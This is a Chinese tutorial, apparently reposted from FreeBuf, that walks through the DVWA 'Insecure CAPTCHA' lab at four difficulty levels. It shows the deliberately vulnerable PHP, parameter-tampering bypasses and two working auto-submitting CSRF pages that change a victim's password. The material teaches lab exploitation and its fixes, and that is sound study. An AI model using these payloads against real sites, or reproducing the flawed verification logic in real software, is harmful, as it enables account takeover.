• 3. 不安全的验证码


    Insecure CAPTCHA

    Insecure CAPTCHA,意思是不安全的验证码,CAPTCHACompletely Automated Public Turing Test to Tell Computers and Humans Apart (全自动区分计算机和人类的图灵测试)的简称。但个人觉得,这一模块的内容叫做不安全的验证流程更妥当些,因为这块主要是验证流程出现了逻辑漏洞,谷歌的验证码表示不背这个锅。

    1.png

    reCAPTCHA验证流程

    这一模块的验证码使用的是Google提供reCAPTCHA服务,下图是验证的具体流程。

    1.png

    服务器通过调用recaptcha_check_answer函数检查用户输入的正确性。

    recaptcha_check_answer($privkey,$remoteip, $challenge,$response)

    参数$privkey是服务器申请的private key $remoteip是用户的ip$challenge recaptcha_challenge_field 字段的值,来自前端页面 ,$responserecaptcha_response_field 字段的值。函数返回ReCaptchaResponse class的实例,ReCaptchaResponse 类有2个属性 :

        $is_valid是布尔型的,表示校验是否有效,
    
        $error是返回的错误代码

    ps:有人也许会问,那这个模块的实验是不是需要科学上网呢?答案是不用,因为我们可以绕过验证码)

    下面对四种级别的代码进行分析。

    Low

    服务器端核心代码:

    <?php 
    
    if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) { 
        // Hide the CAPTCHA form 
        $hide_form = true; 
    
        // Get input 
        $pass_new  = $_POST[ 'password_new' ]; 
        $pass_conf = $_POST[ 'password_conf' ]; 
    
        // Check CAPTCHA from 3rd party 
        $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key' ], 
            $_SERVER[ 'REMOTE_ADDR' ], 
            $_POST[ 'recaptcha_challenge_field' ], 
            $_POST[ 'recaptcha_response_field' ] ); 
    
        // Did the CAPTCHA fail? 
        if( !$resp->is_valid ) { 
            // What happens when the CAPTCHA was entered incorrectly 
            $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>"; 
            $hide_form = false; 
            return; 
        } 
        else { 
            // CAPTCHA was correct. Do both new passwords match? 
            if( $pass_new == $pass_conf ) { 
                // Show next stage for the user 
                echo " 
                    <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre> 
                    <form action="#" method="POST"> 
                        <input type="hidden" name="step" value="2" /> 
                        <input type="hidden" name="password_new" value="{$pass_new}" /> 
                        <input type="hidden" name="password_conf" value="{$pass_conf}" /> 
                        <input type="submit" name="Change" value="Change" /> 
                    </form>"; 
            } 
            else { 
                // Both new passwords do not match. 
                $html     .= "<pre>Both passwords must match.</pre>"; 
                $hide_form = false; 
            } 
        } 
    } 
    
    if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) { 
        // Hide the CAPTCHA form 
        $hide_form = true; 
    
        // Get input 
        $pass_new  = $_POST[ 'password_new' ]; 
        $pass_conf = $_POST[ 'password_conf' ]; 
    
        // Check to see if both password match 
        if( $pass_new == $pass_conf ) { 
            // They do! 
            $pass_new = mysql_real_escape_string( $pass_new ); 
            $pass_new = md5( $pass_new ); 
    
            // Update database 
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; 
            $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); 
    
            // Feedback for the end user 
            echo "<pre>Password Changed.</pre>"; 
        } 
        else { 
            // Issue with the passwords matching 
            echo "<pre>Passwords did not match.</pre>"; 
            $hide_form = false; 
        } 
    
        mysql_close(); 
    } 
    
    ?> 

    可以看到,服务器将改密操作分成了两步,第一步检查用户输入的验证码,验证通过后,服务器返回表单,第二步客户端提交post请求,服务器完成更改密码的操作。但是,这其中存在明显的逻辑漏洞,服务器仅仅通过检查Changestep 参数来判断用户是否已经输入了正确的验证码。

    漏洞利用

    1.通过构造参数绕过验证过程的第一步

    首先输入密码,点击Change按钮,抓包:

    1.png

    ps:因为没有翻墙,所以没能成功显示验证码,发送的请求包中也就没有recaptcha_challenge_fieldrecaptcha_response_field两个参数)

    更改step参数绕过验证码:

    1.png

    修改密码成功:

    1.png

    2.由于没有任何的防CSRF机制,我们可以轻易地构造攻击页面,页面代码如下(详见CSRF模块的教程)。

    <html>
    
    <body onload="document.getElementById('transfer').submit()">
    
    <div>
    
        <form method="POST" id="transfer" action="http://192.168.153.130/dvwa/vulnerabilities/captcha/">
    
    <input type="hidden" name="password_new" value="password">
    
    <input type="hidden" name="password_conf" value="password">
    
    <input type="hidden" name="step" value="2"
    
    <input type="hidden" name="Change" value="Change">
    
    </form>
    
      </div>
    
    </body>
    
    </html>

    当受害者访问这个页面时,攻击脚本会伪造改密请求发送给服务器。

    1.png

    美中不足的是,受害者会看到更改密码成功的界面(这是因为修改密码成功后,服务器会返回302,实现自动跳转),从而意识到自己遭到了攻击。

    1.png

    Medium

    服务器端核心代码:

    <?php 
    
    if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) { 
        // Hide the CAPTCHA form 
        $hide_form = true; 
    
        // Get input 
        $pass_new  = $_POST[ 'password_new' ]; 
        $pass_conf = $_POST[ 'password_conf' ]; 
    
        // Check CAPTCHA from 3rd party 
        $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key' ], 
            $_SERVER[ 'REMOTE_ADDR' ], 
            $_POST[ 'recaptcha_challenge_field' ], 
            $_POST[ 'recaptcha_response_field' ] ); 
    
        // Did the CAPTCHA fail? 
        if( !$resp->is_valid ) { 
            // What happens when the CAPTCHA was entered incorrectly 
            $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>"; 
            $hide_form = false; 
            return; 
        } 
        else { 
            // CAPTCHA was correct. Do both new passwords match? 
            if( $pass_new == $pass_conf ) { 
                // Show next stage for the user 
                echo " 
                    <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre> 
                    <form action="#" method="POST"> 
                        <input type="hidden" name="step" value="2" /> 
                        <input type="hidden" name="password_new" value="{$pass_new}" /> 
                        <input type="hidden" name="password_conf" value="{$pass_conf}" /> 
                        <input type="hidden" name="passed_captcha" value="true" /> 
                        <input type="submit" name="Change" value="Change" /> 
                    </form>"; 
            } 
            else { 
                // Both new passwords do not match. 
                $html     .= "<pre>Both passwords must match.</pre>"; 
                $hide_form = false; 
            } 
        } 
    } 
    
    if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) { 
        // Hide the CAPTCHA form 
        $hide_form = true; 
    
        // Get input 
        $pass_new  = $_POST[ 'password_new' ]; 
        $pass_conf = $_POST[ 'password_conf' ]; 
    
        // Check to see if they did stage 1 
        if( !$_POST[ 'passed_captcha' ] ) { 
            $html     .= "<pre><br />You have not passed the CAPTCHA.</pre>"; 
            $hide_form = false; 
            return; 
        } 
    
        // Check to see if both password match 
        if( $pass_new == $pass_conf ) { 
            // They do! 
            $pass_new = mysql_real_escape_string( $pass_new ); 
            $pass_new = md5( $pass_new ); 
    
            // Update database 
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; 
            $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); 
    
            // Feedback for the end user 
            echo "<pre>Password Changed.</pre>"; 
        } 
        else { 
            // Issue with the passwords matching 
            echo "<pre>Passwords did not match.</pre>"; 
            $hide_form = false; 
        } 
    
        mysql_close(); 
    } 
    
    ?> 

    可以看到,Medium级别的代码在第二步验证时,参加了对参数passed_captcha的检查,如果参数值为true,则认为用户已经通过了验证码检查,然而用户依然可以通过伪造参数绕过验证,本质上来说,这与Low级别的验证没有任何区别。

    漏洞利用

    1.可以通过抓包,更改step参数,增加passed_captcha参数,绕过验证码。

    抓到的包:

    1.png

    更改之后的包:

    1.png

    更改密码成功:

    1.png

    2.依然可以实施CSRF攻击,攻击页面代码如下。

    <html>
    
    <body onload="document.getElementById('transfer').submit()">
    
    <div>
    
        <form method="POST" id="transfer" action="http://127.0.0.1/dvwa/vulnerabilities/captcha/">
    
    <input type="hidden" name="password_new" value="password">
    
    <input type="hidden" name="password_conf" value="password">
    
    <input type="hidden" name="passed_captcha" value="true">
    
    <input type="hidden" name="step" value="2">
    
    <input type="hidden" name="Change" value="Change">
    
    </form>
    
      </div>
    
    </body>
    
    </html>

     

    当受害者访问这个页面时,攻击脚本会伪造改密请求发送给服务器。

    1.png

    不过依然会跳转到更改密码成功的界面。

    1.png

    High

    服务器端核心代码:

    <?php 
    
    if( isset( $_POST[ 'Change' ] ) ) { 
        // Hide the CAPTCHA form 
        $hide_form = true; 
    
        // Get input 
        $pass_new  = $_POST[ 'password_new' ]; 
        $pass_conf = $_POST[ 'password_conf' ]; 
    
        // Check CAPTCHA from 3rd party 
        $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key' ], 
            $_SERVER[ 'REMOTE_ADDR' ], 
            $_POST[ 'recaptcha_challenge_field' ], 
            $_POST[ 'recaptcha_response_field' ] ); 
    
        // Did the CAPTCHA fail? 
        if( !$resp->is_valid && ( $_POST[ 'recaptcha_response_field' ] != 'hidd3n_valu3' || $_SERVER[ 'HTTP_USER_AGENT' ] != 'reCAPTCHA' ) ) { 
            // What happens when the CAPTCHA was entered incorrectly 
            $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>"; 
            $hide_form = false; 
            return; 
        } 
        else { 
            // CAPTCHA was correct. Do both new passwords match? 
            if( $pass_new == $pass_conf ) { 
                $pass_new = mysql_real_escape_string( $pass_new ); 
                $pass_new = md5( $pass_new ); 
    
                // Update database 
                $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "' LIMIT 1;"; 
                $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); 
    
                // Feedback for user 
                echo "<pre>Password Changed.</pre>"; 
            } 
            else { 
                // Ops. Password mismatch 
                $html     .= "<pre>Both passwords must match.</pre>"; 
                $hide_form = false; 
            } 
        } 
    
        mysql_close(); 
    } 
    // Generate Anti-CSRF token 
    generateSessionToken(); 
    
    ?> 

    可以看到,服务器的验证逻辑是当$resp(这里是指谷歌返回的验证结果)是false,并且参数recaptcha_response_field不等于hidd3n_valu3(或者http包头的User-Agent参数不等于reCAPTCHA)时,就认为验证码输入错误,反之则认为已经通过了验证码的检查。

    漏洞利用

    搞清楚了验证逻辑,剩下就是伪造绕过了,由于$resp参数我们无法控制,所以重心放在参数recaptcha_response_fieldUser-Agent上。

    第一步依旧是抓包:

    1.png

    更改参数recaptcha_response_field以及http包头的User-Agent:

    1.png

    密码修改成功:

    1.png

    Impossible

    服务器端核心代码

    if( isset( $_POST[ 'Change' ] ) ) { 
        // Check Anti-CSRF token 
        checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 
    
        // Hide the CAPTCHA form 
        $hide_form = true; 
    
        // Get input 
        $pass_new  = $_POST[ 'password_new' ]; 
        $pass_new  = stripslashes( $pass_new ); 
        $pass_new  = mysql_real_escape_string( $pass_new ); 
        $pass_new  = md5( $pass_new ); 
    
        $pass_conf = $_POST[ 'password_conf' ]; 
        $pass_conf = stripslashes( $pass_conf ); 
        $pass_conf = mysql_real_escape_string( $pass_conf ); 
        $pass_conf = md5( $pass_conf ); 
    
        $pass_curr = $_POST[ 'password_current' ]; 
        $pass_curr = stripslashes( $pass_curr ); 
        $pass_curr = mysql_real_escape_string( $pass_curr ); 
        $pass_curr = md5( $pass_curr ); 
    
        // Check CAPTCHA from 3rd party 
        $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key' ], 
            $_SERVER[ 'REMOTE_ADDR' ], 
            $_POST[ 'recaptcha_challenge_field' ], 
            $_POST[ 'recaptcha_response_field' ] ); 
    
        // Did the CAPTCHA fail? 
        if( !$resp->is_valid ) { 
            // What happens when the CAPTCHA was entered incorrectly 
            echo "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>"; 
            $hide_form = false; 
            return; 
        } 
        else { 
            // Check that the current password is correct 
            $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); 
            $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); 
            $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR ); 
            $data->execute(); 
    
            // Do both new password match and was the current password correct? 
            if( ( $pass_new == $pass_conf) && ( $data->rowCount() == 1 ) ) { 
                // Update the database 
                $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' ); 
                $data->bindParam( ':password', $pass_new, PDO::PARAM_STR ); 
                $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); 
                $data->execute(); 
    
                // Feedback for the end user - success! 
                echo "<pre>Password Changed.</pre>"; 
            } 
            else { 
                // Feedback for the end user - failed! 
                echo "<pre>Either your current password is incorrect or the new passwords did not match.<br />Please try again.</pre>"; 
                $hide_form = false; 
            } 
        } 
    } 
    
    // Generate Anti-CSRF token 
    generateSessionToken(); 
    
    ?> 

    可以看到,Impossible级别的代码增加了Anti-CSRF token 机制防御CSRF攻击,利用PDO技术防护sql注入,验证过程终于不再分成两部分了,验证码无法绕过,同时要求用户输入之前的密码,进一步加强了身份认证。

    1.png

     

    转载自:http://www.freebuf.com/articles/web/119692.html

  • 相关阅读:
    (24)ajax上传json格式的数据
    (23)ajax实现上传文件的功能
    (22)Ajax的基本使用(实现登录功能和局部刷新以及防止跨站请求伪造攻击)
    (21)模型层 -ORM之msql 聚合查询,F和Q(与、或、非查询)、分组查询
    (20)模型层 -ORM之msql 基于双下划线的跨表查询(一对一,一对多,多对多)
    Python init.py
    python 模块积累-----subprocess
    linux修改root密码
    Django urls.py报错: raise TypeError('view must be a callable or a list/tuple in the case of include()
    Python------uuid
  • 原文地址:https://www.cnblogs.com/bmjoker/p/9096199.html
Copyright © 2020-2023  润新知